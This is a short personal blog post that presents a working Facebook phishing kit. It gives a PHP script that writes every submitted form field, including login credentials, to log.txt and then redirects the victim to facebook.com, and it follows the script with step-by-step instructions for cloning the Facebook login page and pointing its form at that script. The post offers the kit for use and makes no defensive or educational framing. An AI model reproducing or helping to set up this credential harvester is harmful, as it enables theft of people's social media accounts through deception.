Hey guys! My name is "Sagar Kumar Dubey" but you can also call me "Sagar CYBER Expert"! In this Blog you will find Cyber Security,Tips&Tricks,Latest Cyber and Network News and many more....

Pages

Saturday, June 17, 2017

facebook phishing coad

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Just copy and past in notepade
Share:

How to facebook phishing

REQUIREMENT:-
1.index.html
2.mail.php
3.log.txt

Process:-
1.open facebook.com then copy the url or link

2.copy url and add it to "IDM" Internet download manager or u can simply save the url file.

3. now open the following downloaded file with notepad:-


4.press ctrl+f and search for the word "action"



5.now rename the word after the "action=https://www.facebook..........................attempt=1" to "mail.php"


6.now rename the whole same file example-"www_facebook_default" to "index.html"

 ---------------------------------------------------------------------------------------------------------------

7. (A) now open the "mail.php" given the the file with the notepad .



    (B)Their you have to rename the "$file=fopen (".............","a")
     (C) In the blank space put or renamed it as" log.txt"
  
(D) now save it
-------------------------------------------------------------------------------------------------------
8. Now create a new file name extension with"log.txt" 
open the log file and write"log" into it...as shown in the given figure.

Share:
sagar dubey. Powered by Blogger.

About Us

Welcome to sagarghost.blogspot.in We are here to help to many people who are wants or in search of Tips&Tricks,cyber security,Wants to Know Latest cyber and network news. Here You will Find all Related Resources... For absolutely free!!!